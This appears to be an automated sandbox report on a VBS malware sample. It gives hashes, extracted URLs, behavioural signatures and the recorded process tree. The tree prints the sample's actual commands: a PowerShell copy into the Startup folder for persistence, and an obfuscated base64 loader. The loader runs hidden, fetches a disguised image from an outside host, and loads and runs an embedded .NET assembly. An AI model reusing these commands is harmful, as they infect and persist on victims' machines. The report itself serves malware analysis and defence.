Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
150s -
max time network
148s -
platform
windows10-2004_x64 -
resource
win10v2004-20230915-en -
resource tags
arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system -
submitted
30/09/2023, 16:38
Static task
static1
Behavioral task
behavioral1
Sample
d6d2fd916703877c65003236a82977a38fc1985dd53a10ccdc2e9e87d944880c_JC.vbs
Resource
win7-20230831-en
Behavioral task
behavioral2
Sample
d6d2fd916703877c65003236a82977a38fc1985dd53a10ccdc2e9e87d944880c_JC.vbs
Resource
win10v2004-20230915-en
General
-
Target
d6d2fd916703877c65003236a82977a38fc1985dd53a10ccdc2e9e87d944880c_JC.vbs
-
Size
388KB
-
MD5
f1e2837c633fd4e56a337b821204f5f3
-
SHA1
e69de9d01dde4f6b4a59c92ba8b1cd0e76e06d4e
-
SHA256
d6d2fd916703877c65003236a82977a38fc1985dd53a10ccdc2e9e87d944880c
-
SHA512
c07b48c861aa1fe9420b459c448f553d546ab66ba51610dacb4f2fad74e9c7c5212c0675c952b39bb6bbc3c980f736ca945674596a657cb123317d257db35ab7
-
SSDEEP
3072:wpPFVyheQQTzHT8DSZSlAjl4nJXZgvmJNecfzTPr+9Zr+Hwi5nMfxNf8fgfPwwE6:23CAZ4J+WUEzT5nQ3N
Malware Config
Extracted
https://uploaddeimagens.com.br/images/004/616/609/original/rump_vbs.jpg?1695408937
https://uploaddeimagens.com.br/images/004/616/609/original/rump_vbs.jpg?1695408937
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 40 3708 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Control Panel\International\Geo\Nation WScript.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ iYscWiLbHK.vbs powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ iYscWiLbHK.vbs powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1620 PING.EXE -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 1972 powershell.exe 1972 powershell.exe 1492 powershell.exe 1492 powershell.exe 3708 powershell.exe 3708 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 1972 powershell.exe Token: SeDebugPrivilege 1492 powershell.exe Token: SeDebugPrivilege 3708 powershell.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 4656 wrote to memory of 4076 4656 WScript.exe 86 PID 4656 wrote to memory of 4076 4656 WScript.exe 86 PID 4076 wrote to memory of 1620 4076 cmd.exe 87 PID 4076 wrote to memory of 1620 4076 cmd.exe 87 PID 4076 wrote to memory of 2316 4076 cmd.exe 94 PID 4076 wrote to memory of 2316 4076 cmd.exe 94 PID 2316 wrote to memory of 1972 2316 cmd.exe 95 PID 2316 wrote to memory of 1972 2316 cmd.exe 95 PID 4656 wrote to memory of 1492 4656 WScript.exe 97 PID 4656 wrote to memory of 1492 4656 WScript.exe 97 PID 1492 wrote to memory of 3708 1492 powershell.exe 100 PID 1492 wrote to memory of 3708 1492 powershell.exe 100
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\d6d2fd916703877c65003236a82977a38fc1985dd53a10ccdc2e9e87d944880c_JC.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4656 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 & cmd.exe /c "powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\d6d2fd916703877c65003236a82977a38fc1985dd53a10ccdc2e9e87d944880c_JC.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ "iYscWiLbHK".vbs')"2⤵
- Suspicious use of WriteProcessMemory
PID:4076 -
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:1620
-
-
C:\Windows\system32\cmd.execmd.exe /c "powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\d6d2fd916703877c65003236a82977a38fc1985dd53a10ccdc2e9e87d944880c_JC.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ "iYscWiLbHK".vbs')"3⤵
- Suspicious use of WriteProcessMemory
PID:2316 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\d6d2fd916703877c65003236a82977a38fc1985dd53a10ccdc2e9e87d944880c_JC.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ "iYscWiLbHK".vbs')4⤵
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1972
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = 'J◀▶Bp◀▶G0◀▶YQBn◀▶GU◀▶VQBy◀▶Gw◀▶I◀▶◀▶9◀▶C◀▶◀▶JwBo◀▶HQ◀▶d◀▶Bw◀▶HM◀▶Og◀▶v◀▶C8◀▶dQBw◀▶Gw◀▶bwBh◀▶GQ◀▶Z◀▶Bl◀▶Gk◀▶bQBh◀▶Gc◀▶ZQBu◀▶HM◀▶LgBj◀▶G8◀▶bQ◀▶u◀▶GI◀▶cg◀▶v◀▶Gk◀▶bQBh◀▶Gc◀▶ZQBz◀▶C8◀▶M◀▶◀▶w◀▶DQ◀▶Lw◀▶2◀▶DE◀▶Ng◀▶v◀▶DY◀▶M◀▶◀▶5◀▶C8◀▶bwBy◀▶Gk◀▶ZwBp◀▶G4◀▶YQBs◀▶C8◀▶cgB1◀▶G0◀▶c◀▶Bf◀▶HY◀▶YgBz◀▶C4◀▶agBw◀▶Gc◀▶Pw◀▶x◀▶DY◀▶OQ◀▶1◀▶DQ◀▶M◀▶◀▶4◀▶Dk◀▶Mw◀▶3◀▶Cc◀▶Ow◀▶k◀▶Hc◀▶ZQBi◀▶EM◀▶b◀▶Bp◀▶GU◀▶bgB0◀▶C◀▶◀▶PQ◀▶g◀▶E4◀▶ZQB3◀▶C0◀▶TwBi◀▶Go◀▶ZQBj◀▶HQ◀▶I◀▶BT◀▶Hk◀▶cwB0◀▶GU◀▶bQ◀▶u◀▶E4◀▶ZQB0◀▶C4◀▶VwBl◀▶GI◀▶QwBs◀▶Gk◀▶ZQBu◀▶HQ◀▶Ow◀▶k◀▶Gk◀▶bQBh◀▶Gc◀▶ZQBC◀▶Hk◀▶d◀▶Bl◀▶HM◀▶I◀▶◀▶9◀▶C◀▶◀▶J◀▶B3◀▶GU◀▶YgBD◀▶Gw◀▶aQBl◀▶G4◀▶d◀▶◀▶u◀▶EQ◀▶bwB3◀▶G4◀▶b◀▶Bv◀▶GE◀▶Z◀▶BE◀▶GE◀▶d◀▶Bh◀▶Cg◀▶J◀▶Bp◀▶G0◀▶YQBn◀▶GU◀▶VQBy◀▶Gw◀▶KQ◀▶7◀▶CQ◀▶aQBt◀▶GE◀▶ZwBl◀▶FQ◀▶ZQB4◀▶HQ◀▶I◀▶◀▶9◀▶C◀▶◀▶WwBT◀▶Hk◀▶cwB0◀▶GU◀▶bQ◀▶u◀▶FQ◀▶ZQB4◀▶HQ◀▶LgBF◀▶G4◀▶YwBv◀▶GQ◀▶aQBu◀▶Gc◀▶XQ◀▶6◀▶Do◀▶VQBU◀▶EY◀▶O◀▶◀▶u◀▶Ec◀▶ZQB0◀▶FM◀▶d◀▶By◀▶Gk◀▶bgBn◀▶Cg◀▶J◀▶Bp◀▶G0◀▶YQBn◀▶GU◀▶QgB5◀▶HQ◀▶ZQBz◀▶Ck◀▶Ow◀▶k◀▶HM◀▶d◀▶Bh◀▶HI◀▶d◀▶BG◀▶Gw◀▶YQBn◀▶C◀▶◀▶PQ◀▶g◀▶Cc◀▶P◀▶◀▶8◀▶EI◀▶QQBT◀▶EU◀▶Ng◀▶0◀▶F8◀▶UwBU◀▶EE◀▶UgBU◀▶D4◀▶Pg◀▶n◀▶Ds◀▶J◀▶Bl◀▶G4◀▶Z◀▶BG◀▶Gw◀▶YQBn◀▶C◀▶◀▶PQ◀▶g◀▶Cc◀▶P◀▶◀▶8◀▶EI◀▶QQBT◀▶EU◀▶Ng◀▶0◀▶F8◀▶RQBO◀▶EQ◀▶Pg◀▶+◀▶Cc◀▶Ow◀▶k◀▶HM◀▶d◀▶Bh◀▶HI◀▶d◀▶BJ◀▶G4◀▶Z◀▶Bl◀▶Hg◀▶I◀▶◀▶9◀▶C◀▶◀▶J◀▶Bp◀▶G0◀▶YQBn◀▶GU◀▶V◀▶Bl◀▶Hg◀▶d◀▶◀▶u◀▶Ek◀▶bgBk◀▶GU◀▶e◀▶BP◀▶GY◀▶K◀▶◀▶k◀▶HM◀▶d◀▶Bh◀▶HI◀▶d◀▶BG◀▶Gw◀▶YQBn◀▶Ck◀▶Ow◀▶k◀▶GU◀▶bgBk◀▶Ek◀▶bgBk◀▶GU◀▶e◀▶◀▶g◀▶D0◀▶I◀▶◀▶k◀▶Gk◀▶bQBh◀▶Gc◀▶ZQBU◀▶GU◀▶e◀▶B0◀▶C4◀▶SQBu◀▶GQ◀▶ZQB4◀▶E8◀▶Zg◀▶o◀▶CQ◀▶ZQBu◀▶GQ◀▶RgBs◀▶GE◀▶Zw◀▶p◀▶Ds◀▶J◀▶Bz◀▶HQ◀▶YQBy◀▶HQ◀▶SQBu◀▶GQ◀▶ZQB4◀▶C◀▶◀▶LQBn◀▶GU◀▶I◀▶◀▶w◀▶C◀▶◀▶LQBh◀▶G4◀▶Z◀▶◀▶g◀▶CQ◀▶ZQBu◀▶GQ◀▶SQBu◀▶GQ◀▶ZQB4◀▶C◀▶◀▶LQBn◀▶HQ◀▶I◀▶◀▶k◀▶HM◀▶d◀▶Bh◀▶HI◀▶d◀▶BJ◀▶G4◀▶Z◀▶Bl◀▶Hg◀▶Ow◀▶k◀▶HM◀▶d◀▶Bh◀▶HI◀▶d◀▶BJ◀▶G4◀▶Z◀▶Bl◀▶Hg◀▶I◀▶◀▶r◀▶D0◀▶I◀▶◀▶k◀▶HM◀▶d◀▶Bh◀▶HI◀▶d◀▶BG◀▶Gw◀▶YQBn◀▶C4◀▶T◀▶Bl◀▶G4◀▶ZwB0◀▶Gg◀▶Ow◀▶k◀▶GI◀▶YQBz◀▶GU◀▶Ng◀▶0◀▶Ew◀▶ZQBu◀▶Gc◀▶d◀▶Bo◀▶C◀▶◀▶PQ◀▶g◀▶CQ◀▶ZQBu◀▶GQ◀▶SQBu◀▶GQ◀▶ZQB4◀▶C◀▶◀▶LQ◀▶g◀▶CQ◀▶cwB0◀▶GE◀▶cgB0◀▶Ek◀▶bgBk◀▶GU◀▶e◀▶◀▶7◀▶CQ◀▶YgBh◀▶HM◀▶ZQ◀▶2◀▶DQ◀▶QwBv◀▶G0◀▶bQBh◀▶G4◀▶Z◀▶◀▶g◀▶D0◀▶I◀▶◀▶k◀▶Gk◀▶bQBh◀▶Gc◀▶ZQBU◀▶GU◀▶e◀▶B0◀▶C4◀▶UwB1◀▶GI◀▶cwB0◀▶HI◀▶aQBu◀▶Gc◀▶K◀▶◀▶k◀▶HM◀▶d◀▶Bh◀▶HI◀▶d◀▶BJ◀▶G4◀▶Z◀▶Bl◀▶Hg◀▶L◀▶◀▶g◀▶CQ◀▶YgBh◀▶HM◀▶ZQ◀▶2◀▶DQ◀▶T◀▶Bl◀▶G4◀▶ZwB0◀▶Gg◀▶KQ◀▶7◀▶CQ◀▶YwBv◀▶G0◀▶bQBh◀▶G4◀▶Z◀▶BC◀▶Hk◀▶d◀▶Bl◀▶HM◀▶I◀▶◀▶9◀▶C◀▶◀▶WwBT◀▶Hk◀▶cwB0◀▶GU◀▶bQ◀▶u◀▶EM◀▶bwBu◀▶HY◀▶ZQBy◀▶HQ◀▶XQ◀▶6◀▶Do◀▶RgBy◀▶G8◀▶bQBC◀▶GE◀▶cwBl◀▶DY◀▶N◀▶BT◀▶HQ◀▶cgBp◀▶G4◀▶Zw◀▶o◀▶CQ◀▶YgBh◀▶HM◀▶ZQ◀▶2◀▶DQ◀▶QwBv◀▶G0◀▶bQBh◀▶G4◀▶Z◀▶◀▶p◀▶Ds◀▶J◀▶Bs◀▶G8◀▶YQBk◀▶GU◀▶Z◀▶BB◀▶HM◀▶cwBl◀▶G0◀▶YgBs◀▶Hk◀▶I◀▶◀▶9◀▶C◀▶◀▶WwBT◀▶Hk◀▶cwB0◀▶GU◀▶bQ◀▶u◀▶FI◀▶ZQBm◀▶Gw◀▶ZQBj◀▶HQ◀▶aQBv◀▶G4◀▶LgBB◀▶HM◀▶cwBl◀▶G0◀▶YgBs◀▶Hk◀▶XQ◀▶6◀▶Do◀▶T◀▶Bv◀▶GE◀▶Z◀▶◀▶o◀▶CQ◀▶YwBv◀▶G0◀▶bQBh◀▶G4◀▶Z◀▶BC◀▶Hk◀▶d◀▶Bl◀▶HM◀▶KQ◀▶7◀▶CQ◀▶d◀▶B5◀▶H◀▶◀▶ZQ◀▶g◀▶D0◀▶I◀▶◀▶k◀▶Gw◀▶bwBh◀▶GQ◀▶ZQBk◀▶EE◀▶cwBz◀▶GU◀▶bQBi◀▶Gw◀▶eQ◀▶u◀▶Ec◀▶ZQB0◀▶FQ◀▶eQBw◀▶GU◀▶K◀▶◀▶n◀▶EY◀▶aQBi◀▶GU◀▶cg◀▶u◀▶Eg◀▶bwBt◀▶GU◀▶Jw◀▶p◀▶Ds◀▶J◀▶Bt◀▶GU◀▶d◀▶Bo◀▶G8◀▶Z◀▶◀▶g◀▶D0◀▶I◀▶◀▶k◀▶HQ◀▶eQBw◀▶GU◀▶LgBH◀▶GU◀▶d◀▶BN◀▶GU◀▶d◀▶Bo◀▶G8◀▶Z◀▶◀▶o◀▶Cc◀▶VgBB◀▶Ek◀▶Jw◀▶p◀▶C4◀▶SQBu◀▶HY◀▶bwBr◀▶GU◀▶K◀▶◀▶k◀▶G4◀▶dQBs◀▶Gw◀▶L◀▶◀▶g◀▶Fs◀▶bwBi◀▶Go◀▶ZQBj◀▶HQ◀▶WwBd◀▶F0◀▶I◀▶◀▶o◀▶Cc◀▶d◀▶B4◀▶HQ◀▶LgBD◀▶Fg◀▶R◀▶BS◀▶EY◀▶LwB0◀▶GM◀▶YQB0◀▶G4◀▶bwBD◀▶C8◀▶a◀▶Bj◀▶GU◀▶d◀▶◀▶u◀▶G8◀▶ZgBu◀▶Gk◀▶YQBt◀▶HI◀▶bwBm◀▶G8◀▶cgBw◀▶C8◀▶Lw◀▶6◀▶HM◀▶c◀▶B0◀▶HQ◀▶a◀▶◀▶n◀▶C◀▶◀▶L◀▶◀▶g◀▶Cc◀▶Z◀▶Bm◀▶GQ◀▶ZgBk◀▶Cc◀▶I◀▶◀▶s◀▶C◀▶◀▶JwBk◀▶GY◀▶Z◀▶Bm◀▶Cc◀▶I◀▶◀▶s◀▶C◀▶◀▶JwBk◀▶GY◀▶Z◀▶Bm◀▶Cc◀▶I◀▶◀▶s◀▶C◀▶◀▶JwBk◀▶GE◀▶Z◀▶Bz◀▶GE◀▶Jw◀▶g◀▶Cw◀▶I◀▶◀▶n◀▶GQ◀▶ZQ◀▶n◀▶C◀▶◀▶L◀▶◀▶g◀▶Cc◀▶YwB1◀▶Cc◀▶KQ◀▶p◀▶◀▶=='";$OWjuxd = [system.Text.encoding]::Unicode.GetString("[system.Convert]::Frombase64string( $codigo.replace('◀▶','A') ))";powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD""2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1492 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/616/609/original/rump_vbs.jpg?1695408937';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.CXDRF/tcatnoC/hcet.ofniamroforp//:sptth' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3708
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
64B
MD5a6c9d692ed2826ecb12c09356e69cc09
SHA1def728a6138cf083d8a7c61337f3c9dade41a37f
SHA256a07d329eb9b4105ba442c89f7cfa0d7b263f9f0617e26df93cf8cdc8dc94d57b
SHA5122f27d2b241ce34f988c39e17ca5a1ebe628ac6c1b8ee8df121db9ad8929eaadf5f24ad66457591cccf87e60d2ba2eab88af860ab9c323a5c2a9867045d6e7ba3
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82